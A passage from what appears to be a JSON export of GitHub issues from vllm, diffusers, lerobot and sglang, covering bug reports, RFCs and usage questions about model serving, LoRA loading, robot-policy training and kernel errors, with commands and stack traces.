Then perform `max` to obtain the global max value and its corresponding index (a sketch follows below).\n\n### Feedback Period.\n\n_No response_\n\n### CC List.\n\n@youkaichao @zhuohan123 @WoosukKwon\n\n### Any Other Things.\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31216", "state": "open", "labels": [ "RFC" ], "created_at": "2025-12-23T10:23:34Z", "updated_at": "2025-12-26T03:33:04Z", "comments": 2, "user": "whx-sjtu" }, { "repo": "huggingface/diffusers", "number": 12884, "title": "Compatibility issues regarding checkpoint/VAE dependency conflicts when Diffusers loads a Civitai LoRA", "body": "Hello everyone, I'm currently learning to use diffusers and would like to ask a question. I found a good LoRA on Civitai, but this LoRA requires a specific checkpoint and VAE, so I downloaded both models as the author requested. However, when I ran the following code, an error occurred.\nThe specific code is as follows:\n~~~python\npipeline = StableDiffusionPipeline.from_single_file(\n r\"E:\\Project_draw\\Models\\vae\\clearvaeSD15_v23.safetensors\",\n use_safetensors=True,\n torch_dtype=torch.float16,\n safety_checker=None\n )\n~~~\nThe errors are as follows:\n\n\"Image\"\n\nI checked the documentation of diffusers. The documentation mentioned that it is possible to load a model this way, but I don't know why an error occurred. I saw many conversion scripts in the scripts folder of diffusers, but I don't know which one is the right conversion script or what its requirements are. If anyone knows how to solve this, could you please tell me how?", "url": "https://github.com/huggingface/diffusers/issues/12884", "state": "closed", "labels": [], "created_at": "2025-12-23T10:11:27Z", "updated_at": "2025-12-23T13:41:47Z", "comments": 1, "user": "hhhFuture" }, { "repo": "vllm-project/vllm", "number": 31211, "title": "[Doc]: Add missing GPT-OSS tool calling instructions", "body": "### \ud83d\udcda The doc issue\n\nCurrently the `openai` tool calling format is not documented in [the tool calling documentation](https://docs.vllm.ai/en/stable/features/tool_calling/). 
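Returning to the sampling RFC (vllm #31216) above: a minimal single-process sketch of the gather-after-argmax math, simulating the TP vocab shards with `chunk` (the distributed exchange of the per-rank (value, index) pairs is left implicit; all names are illustrative):

```python
import torch

vocab, tp = 1024, 4
logits = torch.randn(8, vocab)            # [batch, vocab]
shards = logits.chunk(tp, dim=-1)         # what each TP rank would hold

# Per-rank: local argmax over the rank's own vocab shard.
local_vals = torch.stack([s.max(dim=-1).values for s in shards])                  # [tp, batch]
local_idx = torch.stack(
    [s.max(dim=-1).indices + r * (vocab // tp) for r, s in enumerate(shards)]
)                                                                                 # [tp, batch]

# "Gather" only tp scalars per sequence instead of the full vocab row,
# then reduce to the global argmax.
winner = local_vals.max(dim=0).indices                                            # [batch]
global_idx = local_idx.gather(0, winner.unsqueeze(0)).squeeze(0)

assert torch.equal(global_idx, logits.argmax(dim=-1))
```

Each rank communicates one (value, index) pair per sequence rather than its whole logits shard, which is where the reported >200 us saving would come from.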
However it is documented in the [cookbook](https://docs.vllm.ai/projects/recipes/en/latest/OpenAI/GPT-OSS.html#tool-use)\n\n### Suggest a potential alternative/fix\n\nIt would make sense to list the `openai` format alongside the other formats\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31211", "state": "closed", "labels": [ "documentation" ], "created_at": "2025-12-23T08:35:09Z", "updated_at": "2025-12-25T05:29:11Z", "comments": 0, "user": "amithkk" }, { "repo": "huggingface/lerobot", "number": 2704, "title": "Training XVLA: IndexError with auto mode; size mismatch with joint mode on 14D joint-action dataset", "body": "### Ticket Type\n\n\ud83d\udc1b Bug Report (Something isn't working)\n\n### Environment & System Info\n\n```Shell\n\n```\n\n### Description\n\nI am trying to train XVLA with base and folding checkpoint on a 14D joint-action dataset.\nWhen I set --policy.action_mode=auto\nlerobot-train \\\n --dataset.repo_id= \\\n --output_dir=./outputs/xvla_bimanual \\\n --job_name=xvla_training \\\n --policy.dtype=bfloat16 \\\n --steps=3000 \\\n --policy.device=cuda \\\n --policy.action_mode=auto \\\n --policy.max_action_dim=20 \\\n --policy.repo_id= \\\n --policy.path=\"lerobot/xvla-base\" \\\n --policy.freeze_vision_encoder=false \\\n --policy.freeze_language_encoder=false \\\n --policy.train_policy_transformer=true \\\n --policy.train_soft_prompts=true \\\n --rename_map='{\n \"observation.images.top\": \"observation.images.image\",\n \"observation.images.right\": \"observation.images.image2\",\n \"observation.images.left\": \"observation.images.empty_camera_0\"\n}'\nI've got this error:\n\nNFO 2025-12-23 06:44:14 ot_train.py:310 Output dir: outputs/xvla_bimanual\nINFO 2025-12-23 06:44:14 ot_train.py:317 cfg.steps=3000 (3K)\nINFO 2025-12-23 06:44:14 ot_train.py:318 dataset.num_frames=1724070 (2M)\nINFO 2025-12-23 06:44:14 ot_train.py:319 dataset.num_episodes=1613\nINFO 2025-12-23 06:44:14 ot_train.py:322 Effective batch size: 8 x 1 = 8\nINFO 2025-12-23 06:44:14 ot_train.py:323 num_learnable_params=879482456 (879M)\nINFO 2025-12-23 06:44:14 ot_train.py:324 num_total_params=879482456 (879M)\nINFO 2025-12-23 06:44:14 ot_train.py:380 Start offline training on a fixed dataset, with effective batch size: 8\nTraceback (most recent call last):\n File \"/lambda/nfs/XVLA/X-VLA/.venv/bin/lerobot-train\", line 8, in \n sys.exit(main())\n File \"/lambda/nfs/XVLA/lerobot/src/lerobot/scripts/lerobot_train.py\", line 516, in main\n train()\n File \"/lambda/nfs/XVLA/lerobot/src/lerobot/configs/parser.py\", line 233, in wrapper_inner\n response = fn(cfg, *args, **kwargs)\n File \"/lambda/nfs/XVLA/lerobot/src/lerobot/scripts/lerobot_train.py\", line 386, in train\n batch = next(dl_iter)\n File \"/lambda/nfs/XVLA/lerobot/src/lerobot/datasets/utils.py\", line 912, in cycle\n yield next(iterator)\n File \"/lambda/nfs/XVLA/X-VLA/.venv/lib/python3.10/site-packages/accelerate/data_loader.py\", line 579, in __iter__\n next_batch = next(dataloader_iter)\n File \"/lambda/nfs/XVLA/X-VLA/.venv/lib/python3.10/site-packages/torch/utils/data/dataloader.py\", line 733, in __next__\n data = self._next_data()\n File \"/lambda/nfs/XVLA/X-VLA/.venv/lib/python3.10/site-packages/torch/utils/data/dataloader.py\", line 1515, in _next_data\n return 
self._process_data(data, worker_id)\n File \"/lambda/nfs/XVLA/X-VLA/.venv/lib/python3.10/site-packages/torch/utils/data/dataloader.py\", line 1550, in _process_data\n data.reraise()\n File \"/lambda/nfs/XVLA/X-VLA/.venv/lib/python3.10/site-packages/torch/_utils.py\", line 750, in reraise\n raise exception\nIndexError: Caught IndexError in DataLoader worker process 2.\nOriginal Traceback (most recent call last):\n File \"/lambda/nfs/XVLA/X-VLA/.venv/lib/python3.10/site-packages/torch/utils/data/_utils/worker.py\", line 349, in _worker_loop\n data = fetcher.fetch(index) # type: ignore[possibly-undefined]\n File \"/lambda/nfs/XVLA/X-VLA/.venv/lib/python3.10/site-packages/torch/utils/data/_utils/fetch.py\", line 52, in fetch\n data = [self.dataset[idx] for idx in possibly_batched_index]\n File \"/lambda/nfs/XVLA/X-VLA/.venv/lib/python3.10/site-packages/torch/utils/data/_utils/fetch.py\", line 52, in \n data = [self.dataset[idx] for idx in possibly_batched_index]\n File \"/lambda/nfs/XVLA/lerobot/src/lerobot/datasets/lerobot_dataset.py\", line 1028, in __getitem__\n item = self.hf_dataset[idx]\n File \"/lambda/nfs/XVLA/X-VLA/.venv/lib/python3.10/site-packages/datasets/arrow_dataset.py\", line 2862, in __getitem__\n return self._getitem(key)\n File \"/lambda/nfs/XVLA/X-VLA/.venv/lib/python3.10/site-packages/datasets/arrow_dataset.py\", line 2843, in _getitem\n pa_subtable = query_table(self._data, key, indices=self._indices)\n File \"/lambda/nfs/XVLA/X-VLA/.venv/lib/python3.10/site-packages/datasets/formatting/formatting.py\", line 612, in query_table\n _check_valid_index_key(key, size)\n File \"/lambda/nfs/XVLA/X-VLA/.venv/lib/python3.10/site-packages/datasets/formatting/formatting.py\", line 552, in _check_valid_index_key\n raise IndexError(f\"Invalid key: {key} is out of bounds for size {size}\")\nIndexError: Invalid key: 1723717 is out of bounds for size 1708592\n\nWhen --policy.action_mode=joint, remove --policy.max_action_dim=20, I've this error:\n\nINFO 2025-12-23 07:14:31 ot_train.py:195 Logs will be saved locally.\nINFO 2025-12-23 07:14:31 ot_train.py:207 Creating dataset\nINFO 2025-12-23 07:14:32 ot_train.py:226 Creating policy\nFlorence2ForConditionalGeneration has generative capabilities, as `prepare_inputs_for_generation` is explicitly defined. However, it doesn't directly inherit from `GenerationMixin`. From \ud83d\udc49v4.50\ud83d\udc48 onwards, `PreTrainedModel` will NOT inherit from `Gen", "url": "https://github.com/huggingface/lerobot/issues/2704", "state": "closed", "labels": [ "bug", "documentation", "question", "policies", "dataset", "CI", "examples", "training" ], "created_at": "2025-12-23T07:20:25Z", "updated_at": "2025-12-23T08:54:21Z", "user": "DaKhanh" }, { "repo": "vllm-project/vllm", "number": 31205, "title": "ValueError: Qwen3OmniMoeThinkerForConditionalGeneration does not support LoRA yet.", "body": "\nhi, I have trained qwen3-omni thinker via ms-swift. 
However, when I tried to infer qwen3-omni with lora ckpt, an error occurred:\n```\nValueError: Qwen3OmniMoeThinkerForConditionalGeneration does not support LoRA yet.\n```\n\nI have tried many versions of vllm, including 0.9.2, 0.11.0 and 0.12.0.\n\nHere is my script:\n\n```\nCUDA_VISIBLE_DEVICES=0,1 \\\nMAX_PIXELS=1003520 \\\nswift infer \\\n --model models/omni/Qwen3-Omni/Qwen3-Omni-30B-A3B-Instruct \\\n --adapters ckpt/Qwen3-Omni/v4-20251212-163234/checkpoint-3 \\\n --merge_lora false \\\n --stream true \\\n --infer_backend vllm \\\n --val_dataset ms-swift/data/train_test.jsonl \\\n --vllm_gpu_memory_utilization 0.9 \\\n --vllm_tensor_parallel_size 2 \\\n --vllm_max_model_len 32768 \\\n --max_new_tokens 2048 \\\n --vllm_limit_mm_per_prompt '{'image': 3, 'video': 3, 'audio': 3}'\n\n```\n\n\nHow can I solve this problem?\n", "url": "https://github.com/vllm-project/vllm/issues/31205", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-23T06:52:11Z", "updated_at": "2025-12-29T14:50:37Z", "comments": 2, "user": "VJJJJJJ1" }, { "repo": "vllm-project/vllm", "number": 31204, "title": "[RFC]: Supporting Multi MTP layers in Speculative Decoding (EagleProposer)", "body": "### Motivation.\n\nThe EagleProposer for speculative decoding is only able to utilize the first MTP layer.\nHowever, the model [XiaomiMiMo/MiMo-V2-Flash](https://huggingface.co/XiaomiMiMo/MiMo-V2-Flash) has 3 MTP layers.\nIs there any plan or ongoing PR to extend support for multiple MTP layers in speculative decoding?\nbtw, [hugo-wind-ding/qwq-32b-mtp](https://huggingface.co/hugo-wind-ding/qwq-32b-mtp) has 7 MTP layers for QwQ-32B\n\n### Proposed Change.\n\nEagleProposer needs a new member function to pass spec_step_idx to the MTP models when num_nextn_predict_layers > 1 and num_speculative_tokens > 1.\n\n\n### Feedback Period.\n\n_No response_\n\n### CC List.\n\n_No response_\n\n### Any Other Things.\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31204", "state": "open", "labels": [ "RFC" ], "created_at": "2025-12-23T03:34:05Z", "updated_at": "2025-12-23T03:34:05Z", "comments": 0, "user": "DingYibin" }, { "repo": "huggingface/lerobot", "number": 2701, "title": "Image keys with underscores not supported when migrating to v0.4.x", "body": "### Ticket Type\n\n\ud83d\udc1b Bug Report (Something isn't working)\n\n### Environment & System Info\n\n```Shell\nPython 3.12.3, LeRobot versions 0.3.4 and 0.4.2\n\nFrom v0.4.2:\n lerobot version: 0.4.2\n- Platform: Linux-6.14.0-37-generic-x86_64-with-glibc2.39\n- Python version: 3.12.3\n- Huggingface Hub version: 0.35.3\n- Datasets version: 4.1.1\n- Numpy version: 2.2.6\n- PyTorch version: 2.7.1+cu126\n```\n\n### Description\n\nWhen upgrading a model from 0.3.4 to 0.4.2, `migrate_policy_normalization` replaces all `_` in features with `.` at https://github.com/huggingface/lerobot/blob/main/src/lerobot/processor/migrate_policy_normalization.py#L112 . I have a camera named `front_camera` used as `observations.images.front_camera`. 
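A small sketch of the failure mode and a more conservative rewrite (illustrative only; the real key handling lives in lerobot's migration script, and the prefix below is an assumption):

```python
OLD_KEY = "observations.images.front_camera"

def blanket_migrate(key: str) -> str:
    # What the migration effectively does today: rewrite every underscore.
    return key.replace("_", ".")

def safe_migrate(key: str) -> str:
    # Hypothetical fix: normalize only known structural prefixes and leave the
    # user-chosen feature name (which may legitimately contain underscores) intact.
    prefix = "observations.images."
    if key.startswith(prefix):
        return prefix + key[len(prefix):]   # tail is never rewritten
    return key.replace("_", ".")            # fall back for non-image keys

print(blanket_migrate(OLD_KEY))  # observations.images.front.camera -> lookup fails
print(safe_migrate(OLD_KEY))     # observations.images.front_camera -> matches
```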
After migrating my policy, the normalization processor expects `observations.images.front.camera`, causing https://github.com/huggingface/lerobot/blob/main/src/lerobot/processor/normalize_processor.py#L306 to fail, and my images are left unnormalized.\n\nI've hacked it by inserting `key = key.replace(\"_cam\",\".cam\")` right above the check, but this is not a good long-term fix.\n\n### Context & Reproduction\n\n1. Have a model trained under LeRobot 0.3.4 with non-identity normalizations on images, and the image keys having underscores, such as `front_camera`\n2. Check the `input_features` in `config.json`, see the underscores in the image name\n3. Migrate the model to LeRobot 0.4.2 using `migrate_policy_normalization.py`\n4. See that the underscores are preserved in the migrated `config.json`, but in the corresponding `policy_preprocessor_step__normalizer_processor.safetensors` they have been replaced with dots\n\n### Relevant logs or stack trace\n\n```Shell\n\n```\n\n### Checklist\n\n- [x] I have searched existing tickets to ensure this isn't a duplicate.\n- [ ] I am using the latest version of the `main` branch.\n- [x] I have verified this is not an environment-specific problem.\n\n### Additional Info / Workarounds\n\nI've inserted `key = key.replace(\"_cam\",\".cam\")` into `normalize_processor.py` in order to make the keys match what the processor is expecting.", "url": "https://github.com/huggingface/lerobot/issues/2701", "state": "open", "labels": [ "bug", "question", "policies", "sensors", "processor" ], "created_at": "2025-12-23T03:27:41Z", "updated_at": "2025-12-23T03:27:50Z", "user": "dangr" }, { "repo": "huggingface/lerobot", "number": 2700, "title": "Training an Smolvla model on the lerobot/aloha_sim_insertion_human dataset does not converge", "body": "### Ticket Type\n\n\u2753 Technical Question\n\n### Environment & System Info\n\n```Shell\nUbuntu 22.04\nlerobot 0.4.1\npython 3.10\n\nlerobot-train \\\n --job_name aloha_smolvla \\\n --output_dir $OUTPUT_DIR \\\n --env.type=aloha \\\n --env.task=\"AlohaInsertion-v0\" \\\n --policy.type=smolvla \\\n --policy.load_vlm_weights=true \\\n --steps=200000 \\\n --eval_freq=50000 \\\n --save_freq=50000 \\\n --dataset.repo_id=\"lerobot/aloha_sim_insertion_human\" \\\n --policy.push_to_hub=false \\\n --wandb.enable=true\n```\n\n### Description\n\nI am tring to train Smolvla model on the lerobot/aloha_sim_insertion_human dataset, but the training does not converge. 
In the simulation, the robotic arm trembled and got stuck at a certain position, failing to successfully pick up the object.\n\n### Context & Reproduction\n\n```bash\nlerobot-train \\\n --job_name aloha_smolvla \\\n --output_dir $OUTPUT_DIR \\\n --env.type=aloha \\\n --env.task=\"AlohaInsertion-v0\" \\\n --policy.type=smolvla \\\n --policy.load_vlm_weights=true \\\n --steps=200000 \\\n --eval_freq=50000 \\\n --save_freq=50000 \\\n --dataset.repo_id=\"lerobot/aloha_sim_insertion_human\" \\\n --policy.push_to_hub=false \\\n --wandb.enable=true\n\nlerobot-eval \\\n --policy.path=\"$CHECKPOINT_DIR\" \\\n --env.type=aloha \\\n --env.task=\"AlohaInsertion-v0\" \\\n --eval.n_episodes=50 \\\n --eval.batch_size=50\n```\n\nhttps://github.com/user-attachments/assets/97feea83-2f1e-45a3-9253-6dffdd13f7ea\n\n### Relevant logs or stack trace\n\n```Shell\n\n```\n\n### Checklist\n\n- [x] I have searched existing tickets to ensure this isn't a duplicate.\n- [ ] I am using the latest version of the `main` branch.\n- [ ] I have verified this is not an environment-specific problem.\n\n### Additional Info / Workarounds\n\n_No response_", "url": "https://github.com/huggingface/lerobot/issues/2700", "state": "open", "labels": [ "question", "policies", "dataset", "simulation", "robots", "training" ], "created_at": "2025-12-23T03:13:47Z", "updated_at": "2025-12-30T21:05:50Z", "user": "sslndora0612-max" }, { "repo": "vllm-project/vllm", "number": 31202, "title": "[Bug]: Mixtral Fp8 Accuracy is Degraded", "body": "### Your current environment\n\nH200\n\n### \ud83d\udc1b Describe the bug\n- launch\n```bash\nvllm serve amd/Mixtral-8x7B-Instruct-v0.1-FP8-KV --enforce-eager -tp 2\n```\n\n- eval\n```bash\n\nlm_eval \\\n\t--model local-completions \\\n\t--tasks gsm8k \\\n\t--model_args \"model=amd/Mixtral-8x7B-Instruct-v0.1-FP8-KV,base_url=http://localhost:8000/v1/completions,num_concurrent=1000,tokenized_requests=False\"\n```\n\n- on main:\n```bash\nlocal-completions (model=amd/Mixtral-8x7B-Instruct-v0.1-FP8-KV,base_url=http://localhost:8000/v1/completions,num_concurrent=1000,tokenized_requests=False), gen_kwargs: (None), limit: None, num_fewshot: None, batch_size: 1\n|Tasks|Version| Filter |n-shot| Metric | |Value | |Stderr|\n|-----|------:|----------------|-----:|-----------|---|-----:|---|-----:|\n|gsm8k| 3|flexible-extract| 5|exact_match|\u2191 |0.2843|\u00b1 |0.0124|\n| | |strict-match | 5|exact_match|\u2191 |0.2108|\u00b1 |0.0112|\n```\n\n- on 0.12.0:\n```bash\nlocal-completions (model=amd/Mixtral-8x7B-Instruct-v0.1-FP8-KV,base_url=http://localhost:8000/v1/completions,num_concurrent=1000,tokenized_requests=False), gen_kwargs: (None), limit: None, num_fewshot: None, batch_size: 1\n|Tasks|Version| Filter |n-shot| Metric | |Value | |Stderr|\n|-----|------:|----------------|-----:|-----------|---|-----:|---|-----:|\n|gsm8k| 3|flexible-extract| 5|exact_match|\u2191 |0.6459|\u00b1 |0.0132|\n| | |strict-match | 5|exact_match|\u2191 |0.6452|\u00b1 |0.0132|\n```\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31202", "state": "closed", "labels": [ "bug", "help wanted" ], "created_at": "2025-12-23T02:27:28Z", "updated_at": "2025-12-23T02:42:58Z", "comments": 1, "user": "robertgshaw2-redhat" }, { "repo": "vllm-project/vllm", "number": 31200, "title": 
"[Bug]: class Request and block_hasher has cirular reference, may cause memory leak.", "body": "### Your current environment\n\n Running MultiModal Network with prefix caching will cause memory leak. \n
\n\nclass Request:\n def __init__(\n ...\n self.block_hashes: list[BlockHash] = []\n self.get_hash_new_full_blocks: Callable[[], list[BlockHash]] | None = None\n if block_hasher is not None:\n self.get_hash_new_full_blocks = partial(block_hasher, self) # Request holds block_hasher and block_hasher holds Request, creating a circular reference.\n self.block_hashes = self.get_hash_new_full_blocks()\n\n\nCould it be changed to the code below? \n\n\nimport weakref\nclass Request:\n def __init__(\n ...\n self.block_hashes: list[BlockHash] = []\n self.get_hash_new_full_blocks: Callable[[], list[BlockHash]] | None = None\n if block_hasher is not None:\n self.get_hash_new_full_blocks = partial(block_hasher, weakref.proxy(self)) # Use a weakref to avoid the circular reference.\n self.block_hashes = self.get_hash_new_full_blocks()\n\n\n\n```text\nYour output of `python collect_env.py` here\n```\n\n
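As a sanity check of the proposal, here is a self-contained demonstration of the difference (generic Python with stand-in classes, not vLLM's actual `Request`):

```python
import gc
import weakref
from functools import partial

def block_hasher(request):
    return [hash(t) for t in request.tokens]

class Request:
    def __init__(self, tokens, use_weakref=False):
        self.tokens = tokens
        target = weakref.proxy(self) if use_weakref else self
        # With a strong `self`, the instance holds the partial and the partial
        # holds the instance: a reference cycle.
        self.get_hash_new_full_blocks = partial(block_hasher, target)
        self.block_hashes = self.get_hash_new_full_blocks()

gc.disable()  # make the demo deterministic: no cycle collector runs
cyclic = weakref.ref(Request([1, 2, 3]))
print(cyclic() is not None)  # True: the cycle keeps the object alive
acyclic = weakref.ref(Request([1, 2, 3], use_weakref=True))
print(acyclic() is None)     # True: refcounting alone frees it immediately
gc.enable()
```

With the cycle, the object is only reclaimed when the cyclic garbage collector happens to run; if it pins multimodal tensors in the meantime, that shows up as the reported leak.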
\n\n\n### \ud83d\udc1b Describe the bug\n\nRunning a multimodal model will cause a memory leak, \nbecause of the following leak trace: block_hasher -> MultiModalFeatureSpec -> MultiModalKwargsItem -> MultiModalFieldElem -> image_pixels(Tensor)\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31200", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-23T01:55:47Z", "updated_at": "2025-12-23T15:02:37Z", "comments": 1, "user": "frelam" }, { "repo": "huggingface/diffusers", "number": 12881, "title": "Is this a bug in the prompt2prompt pipeline with a word-replacement prompt?", "body": "### Describe the bug\n\nIt performs the same when returning different cross-attention maps. Is this an implementation error, or just a problem with prompt2prompt?\n\n### Reproduction\n\nUse stable-diffusion-2-1:\n`images = pipe([\"A turtle playing with a ball\", \"A monkey playing with a ball\"],\n generator=torch.Generator(\"cuda\").manual_seed(34),\n cross_attention_kwargs={\n \"edit_type\": \"replace\",\n \"local_blend_words\": [\"turtle\", \"monkey\"],\n \"n_cross_replace\": 0.4,\n \"n_self_replace\": 0.4\n }).images`\n\nIt performs the same when a different cross-attention map is returned:\n`class AttentionReplace(AttentionControlEdit):\n def replace_cross_attention(self, attn_base, att_replace):\n return attn_base.unsqueeze(0).expand(att_replace.shape[0], *attn_base.shape)\n return torch.einsum(\"hpw,bwn->bhpn\", attn_base, self.mapper)`\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\nDiffusers=0.30.0\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/12881", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-23T01:55:06Z", "updated_at": "2025-12-23T01:55:06Z", "comments": 0, "user": "lincion" }, { "repo": "sgl-project/sglang", "number": 15641, "title": "[Feature] In the event_loop_overlap function of the scheduler, can the recv operation be processed asynchronously?", "body": "### Checklist\n\n- [x] If this is not a feature request but a general question, please start a discussion at https://github.com/sgl-project/sglang/discussions. Otherwise, it will be closed.\n- [x] Please use English. Otherwise, it will be closed.\n\n### Motivation\n\nIn the _offline large-scale high-concurrency multimodal deterministic inference scenario_, when using `event_loop_overlap` on a single machine, the `recv` operation is performed **synchronously before each step**. This can cause the GPU to idle while waiting on recv, **thereby reducing the utilization rate**.\nWe have implemented a version that moves the recv to a background thread for continuous request reception. We use a priority lock to ensure that incoming requests are prioritized for queueing and processing. 
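A rough sketch of that structure (hypothetical names, not the actual sglang scheduler code; the priority lock is omitted for brevity):

```python
import queue
import threading

class AsyncReceiver:
    """Background thread owns the blocking recv; the scheduler loop stays hot."""

    def __init__(self, recv_socket):
        self.q = queue.Queue()
        self.sock = recv_socket
        threading.Thread(target=self._recv_loop, daemon=True).start()

    def _recv_loop(self):
        while True:                      # blocking recv happens off the hot path
            self.q.put(self.sock.recv())

    def drain(self):
        # Non-blocking: return whatever arrived since the previous step.
        reqs = []
        while True:
            try:
                reqs.append(self.q.get_nowait())
            except queue.Empty:
                return reqs
```

The scheduler then calls `drain()` once per step instead of blocking on the socket before launching the next batch.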
_On a single machine with eight H100 cards_, we have achieved an **increase in utilization from 60% to 75%**.\nWe hope that sglang can provide high-quality support for large-scale offline high-concurrency scenarios with high power and high utilization requirements.\n\n### Related resources\n\n_No response_", "url": "https://github.com/sgl-project/sglang/issues/15641", "state": "open", "labels": [], "created_at": "2025-12-22T14:04:10Z", "updated_at": "2025-12-22T14:04:10Z", "comments": 0, "user": "titanium-temu" }, { "repo": "sgl-project/sglang", "number": 15634, "title": "[Bug] sgl-kernel does not support fa3???", "body": "### Checklist\n\n- [ ] I searched related issues but found no solution.\n- [x] The bug persists in the latest version.\n- [x] Issues without environment info and a minimal reproducible demo are hard to resolve and may receive no feedback.\n- [x] If this is not a bug report but a general question, please start a discussion at https://github.com/sgl-project/sglang/discussions. Otherwise, it will be closed.\n- [x] Please use English. Otherwise, it will be closed.\n\n### Describe the bug\n\nCUDA error (/sgl-kernel/build/_deps/repo-flash-attention-src/hopper/flash_fwd_launch_template.h:166): invalid configuration argument\n\n### Reproduction\n\nno_proxy=\"*\" SGLANG_TORCH_PROFILER_DIR=./ python -m sglang.launch_server --model-path /root/temp_can/DeepSeek-V3-0324 --load-format dummy --tp 4 --ep 4 --disable-cuda-graph --disable-radix-cache --moe-a2a-backend deepep --deepep-mode normal --chunked-prefill-size -1 --host 0.0.0.0 --port 30000 --enable-two-batch-overlap --attention-backend fa3\n\n### Environment\n\n(new_py310) root@zyhuang0-0:~/temp_can/sglang# python3 -m sglang.check_env\nPython: 3.10.19 (main, Oct 21 2025, 16:43:05) [GCC 11.2.0]\nCUDA available: True\nGPU 0,1,2,3: NVIDIA H100 80GB HBM3\nGPU 0,1,2,3 Compute Capability: 9.0\nCUDA_HOME: /usr/local/cuda\nNVCC: Cuda compilation tools, release 12.9, V12.9.41\nCUDA Driver Version: 550.54.15\nPyTorch: 2.9.1+cu128\nsglang: 0.5.6.post2\nsgl_kernel: 0.3.19\nflashinfer_python: 0.5.3\nflashinfer_cubin: 0.5.3\nflashinfer_jit_cache: Module Not Found\ntriton: 3.5.1\ntransformers: 4.57.1\ntorchao: 0.9.0\nnumpy: 2.2.6\naiohttp: 3.13.2\nfastapi: 0.127.0\nhf_transfer: 0.1.9\nhuggingface_hub: 0.36.0\ninteregular: 0.3.3\nmodelscope: 1.33.0\norjson: 3.11.5\noutlines: 0.1.11\npackaging: 25.0\npsutil: 7.1.3\npydantic: 2.12.5\npython-multipart: 0.0.21\npyzmq: 27.1.0\nuvicorn: 0.40.0\nuvloop: 0.22.1\nvllm: Module Not Found\nxgrammar: 0.1.27\nopenai: 2.6.1\ntiktoken: 0.12.0\nanthropic: 0.75.0\nlitellm: Module Not Found\ndecord2: 3.0.0\nNVIDIA Topology: \n GPU0 GPU1 GPU2 GPU3 NIC0 NIC1 NIC2 NIC3 NIC4 NIC5 NIC6 CPU Affinity NUMA Affinity GPU NUMA ID\nGPU0 X NV18 NV18 NV18 SYS PIX SYS SYS SYS SYS SYS 0-47,96-143 0 N/A\nGPU1 NV18 X NV18 NV18 SYS SYS SYS SYS SYS PIX SYS 48-95,144-191 1 N/A\nGPU2 NV18 NV18 X NV18 SYS SYS SYS SYS SYS SYS SYS 48-95,144-191 1 N/A\nGPU3 NV18 NV18 NV18 X SYS SYS SYS SYS SYS SYS PIX 48-95,144-191 1 N/A\nNIC0 SYS SYS SYS SYS X SYS SYS SYS SYS SYS SYS\nNIC1 PIX SYS SYS SYS SYS X SYS SYS SYS SYS SYS\nNIC2 SYS SYS SYS SYS SYS SYS X PXB PXB SYS SYS\nNIC3 SYS SYS SYS SYS SYS SYS PXB X PIX SYS SYS\nNIC4 SYS SYS SYS SYS SYS SYS PXB PIX X SYS SYS\nNIC5 SYS PIX SYS SYS SYS SYS SYS SYS SYS X SYS\nNIC6 SYS SYS SYS PIX SYS SYS SYS SYS SYS SYS X \n\nLegend:\n\n X = Self\n SYS = Connection traversing PCIe as well as the SMP interconnect between NUMA nodes (e.g., QPI/UPI)\n NODE = Connection traversing PCIe as well as the interconnect 
between PCIe Host Bridges within a NUMA node\n PHB = Connection traversing PCIe as well as a PCIe Host Bridge (typically the CPU)\n PXB = Connection traversing multiple PCIe bridges (without traversing the PCIe Host Bridge)\n PIX = Connection traversing at most a single PCIe bridge\n NV# = Connection traversing a bonded set of # NVLinks\n\nNIC Legend:\n\n NIC0: mlx5_0\n NIC1: mlx5_1\n NIC2: mlx5_2\n NIC3: mlx5_3\n NIC4: mlx5_4\n NIC5: mlx5_5\n NIC6: mlx5_6\n\n\nulimit soft: 1048576", "url": "https://github.com/sgl-project/sglang/issues/15634", "state": "open", "labels": [], "created_at": "2025-12-22T10:50:36Z", "updated_at": "2025-12-22T10:50:55Z", "comments": 0, "user": "ziyuhuang123" }, { "repo": "huggingface/lerobot", "number": 2697, "title": "Run pi0.5 on Libero, incorrect version of transformers", "body": "### Ticket Type\n\n\ud83d\udc1b Bug Report (Something isn't working)\n\n### Environment & System Info\n\n```Shell\nCopy-and-paste the text below in your GitHub issue and FILL OUT the last point.\n\n- lerobot version: 0.4.0\n- Platform: Linux-6.8.0-87-generic-x86_64-with-glibc2.35\n- Python version: 3.10.19\n- Huggingface Hub version: 0.35.3\n- Datasets version: 4.1.1\n- Numpy version: 2.2.6\n- PyTorch version: 2.7.1+cu126\n- Is PyTorch built with CUDA support?: True\n- Cuda version: 12.6\n- GPU model: NVIDIA GeForce RTX 4090\n- Using GPU in script?: \n```\n\n### Description\n\nI am running PI0.5 on the Libero benchmark and I encountered the following issues:\n\n```python\nBuilt vec env | suite=libero_spatial | task_id=6 | n_envs=1\nBuilt vec env | suite=libero_spatial | task_id=7 | n_envs=1\nBuilt vec env | suite=libero_spatial | task_id=8 | n_envs=1\nBuilt vec env | suite=libero_spatial | task_id=9 | n_envs=1\nINFO 2025-12-22 03:42:33 bot_eval.py:499 Making policy.\nThe PI05 model is a direct port of the OpenPI implementation. \nThis implementation follows the original 